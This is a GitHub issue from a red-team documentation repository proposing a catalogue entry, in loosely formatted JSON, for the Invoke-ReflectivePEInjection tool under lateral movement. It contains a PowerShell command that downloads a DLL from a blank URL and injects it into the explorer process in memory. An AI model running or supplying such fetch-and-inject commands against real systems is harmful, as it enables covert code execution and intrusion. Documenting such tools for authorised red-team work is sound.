Patrick-DE / RTT-Docs

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New tool: Invoke-ReflectivePEInjection #116

Closed Patrick-DE closed 4 days ago

Patrick-DE commented 11 months ago
  "name": "Invoke-ReflectivePEInjection",
  "phases": [
    "07. Lateral Movement"
  "category": "",
  "stealthy": false,
  "platforms": [
  "source": "",
  "description": "The script performs reflection to avoid writing assemblies to disk, after which it parses the\ndesired PE file. It has two separate modes, the first is to reflectively load a DLL or EXE into the\nsame process, and the second is to load a DLL into a remote process.",
  "undetected": [],
  "detected": [],
  "commands": [
      "id": "051d902d-8712-40db-8e3c-756f07d216f3",
      "name": "Download and inject DLL into memory",
      "description": "Note that the public version of this script fails on versions of Windows 10 1803 or newer due to the multiple instances of GetProcAddress in UnsafeNativeMethods.",
      "tag": "",
      "results": [],
      "cmd": "$bytes = (New-Object\nSystem.Net.WebClient).DownloadData('')\n$procid = (Get-Process -Name explorer).Id\nImport-Module C:\\Tools\\Invoke-ReflectivePEInjection.ps1\nInvoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid"
  "content": "",
  "references": [],
  "language": ""